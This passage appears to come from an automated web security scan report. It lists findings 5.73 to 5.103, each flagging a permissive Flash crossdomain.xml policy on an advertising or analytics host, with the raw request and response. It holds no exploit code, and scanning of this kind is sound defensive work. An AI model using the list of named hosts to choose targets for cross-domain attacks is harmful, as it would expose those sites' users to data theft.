Severity:   High
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: loadus.exelator.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "3678660634"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Sat, 17 Sep 2011 16:28:17 GMT
Server: HTTP server
Connection: close
Via: 1.1 AN-AMP_TM uproxy-3

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>
5.73. http://media.fastclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:04 GMT
Server: Apache/2.2.4 (Unix)
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Content-Length: 202
Keep-Alive: timeout=5, max=19903
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
5.74. http://metrics.elle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.elle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.elle.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:38:13 GMT
Server: Omniture DC/2.0.0
xserver: www661
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
5.75. http://metrics.seattlepi.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.seattlepi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.seattlepi.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:36 GMT
Server: Omniture DC/2.0.0
xserver: www132
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
5.76. http://nai.btrll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.btrll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: nai.btrll.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:52 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Mon, 08 Aug 2011 19:03:54 GMT
ETag: "270012-10d-1bbf7a80"
Accept-Ranges: bytes
Content-Length: 269
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.77. http://o.sa.aol.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.sa.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.sa.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:37:16 GMT
Server: Omniture DC/2.0.0
xserver: www27
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
5.78. http://omnituretrack.local.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituretrack.local.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omnituretrack.local.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:49 GMT
Server: Omniture DC/2.0.0
xserver: www369
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
5.79. http://optout.collective-media.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: optout.collective-media.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 16:43:40 GMT
Content-Type: text/plain
Content-Length: 187
Last-Modified: Thu, 09 Dec 2010 21:18:12 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>
5.80. http://optout.crwdcntrl.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: optout.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:39 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Fri, 29 Jul 2011 15:24:18 GMT
ETag: "2570256-ba-4a936dffbec80"
Accept-Ranges: bytes
Content-Length: 186
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="*" />
</cross-domain-policy>
5.81. http://optout.invitemedia.com:9030/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.invitemedia.com:9030
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: optout.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 16:44:41 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
5.82. http://optout.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: optout.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"288-1307647056000"
Last-Modified: Thu, 09 Jun 2011 19:17:36 GMT
Content-Type: application/xml
Content-Length: 288
Date: Sat, 17 Sep 2011 16:45:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.83. http://p.brilig.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.brilig.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:44 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 07 Sep 2011 16:35:43 GMT
ETag: "55e69-ab-4ac5c890ad5c0"
Accept-Ranges: bytes
Content-Length: 171
X-Brilig-D: D=68
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*"/>

</cross-domain-policy>

5.84. http://pbid.pro-market.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pbid.pro-market.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: tapp3.ny
ETag: W/"207-1312809562000"
Last-Modified: Mon, 08 Aug 2011 13:19:22 GMT
Content-Type: application/xml
Content-Length: 207
Date: Sat, 17 Sep 2011 16:43:43 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
5.85. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:27:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.86. http://pixel.adsafeprotected.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1314985194000"
Last-Modified: Fri, 02 Sep 2011 17:39:54 GMT
Content-Type: application/xml
Content-Length: 202
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...
5.87. http://pixel.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:18:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...
5.88. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Sun, 18 Sep 2011 16:23:09 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sat, 17 Sep 2011 16:23:09 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
5.89. http://privacy.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://privacy.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: privacy.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:44:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.90. http://ps2.newsinc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ps2.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ps2.newsinc.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sat, 17 Sep 2011 16:23:11 GMT
ETag: "069b12745fcc1:0"
Last-Modified: Tue, 10 May 2011 19:04:58 GMT
NDN-Server: PS01
NDN-SiteVer: 3.2.1
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 286
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-ht
...[SNIP]...
5.91. http://r.skimresources.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.skimresources.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.skimresources.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sat, 17 Sep 2011 16:38:55 GMT
ETag: "17c8151-15e-49fb1c5d5e600"
Last-Modified: Wed, 30 Mar 2011 11:49:44 GMT
P3P: policyref="http://skimlinks.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: Apache
Vary: Accept-Encoding
X-SKIM-Hostname: api02.angel.skimlinks.com
Content-Length: 350
Connection: Close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.92. http://r.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sat, 17 Sep 2011 16:46:16 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sat, 17 Sep 2011 16:46:15 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>
5.93. http://rad.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 22 Jul 2011 17:49:14 GMT
Accept-Ranges: bytes
ETag: "0c969ab9748cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 17 Sep 2011 16:27:57 GMT
Connection: keep-alive
Content-Length: 202

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
5.94. http://recs.richrelevance.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: recs.richrelevance.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 17 Sep 2011 16:46:28 GMT
Content-Type: text/plain
Content-Length: 108
Last-Modified: Mon, 08 Nov 2010 18:47:33 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.95. http://rp.gwallet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rp.gwallet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rp.gwallet.com

Response

HTTP/1.0 200 OK
Content-Length: 207
Server: radiumone/1.2
Content-type: text/xml; charset=UTF-8
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-
...[SNIP]...
5.96. http://s.meebocdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.meebocdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.meebocdn.net

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 03 May 2011 00:23:33 GMT
ETag: "3934951678"
Server: lighttpd/1.4.19
Content-Type: text/xml
Cache-Control: max-age=80196
Expires: Sun, 18 Sep 2011 14:52:59 GMT
Date: Sat, 17 Sep 2011 16:36:23 GMT
Content-Length: 348
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" secure="False"/>
<allow-access-from domain="*.meebo.com" secure="False"/>
<allow-http-request-headers-from domain="*.meebo.com" headers="*"/>
<allow-access-from domain="*.meebocdn.net" secure="False"/>
...[SNIP]...
5.97. http://s.xp1.ru4.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 17 Sep 2011 16:46:17 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:33:00 GMT
Content-length: 202
Etag: "ca-4ceae18c"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
5.98. http://s.ytimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.ytimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.ytimg.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Fri, 16 Sep 2011 02:45:19 GMT
Expires: Fri, 23 Sep 2011 02:45:19 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 136897

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.99. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 17 Sep 2011 02:43:00 GMT
Expires: Sat, 17 Sep 2011 02:43:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 49828
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.100. http://sana.newsinc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sana.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sana.newsinc.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9a2df4412dfbe178fccafc4915ad186e:1307641379"
Last-Modified: Thu, 09 Jun 2011 17:42:59 GMT
Accept-Ranges: bytes
Content-Length: 335
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:23:17 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
5.101. http://sb1.analoganalytics.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sb1.analoganalytics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sb1.analoganalytics.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 16:25:01 GMT
Content-Type: text/xml
Content-Length: 259
Last-Modified: Sat, 17 Sep 2011 01:23:33 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
5.102. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 16:23:06 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Sat, 24 Sep 2011 16:23:06 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...
5.103. http://sensor2.suitesmart.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sensor2.suitesmart.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 18 Feb 2011 18:15:01 GMT
ETag: "1f00e1-c9-49c927e105340"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
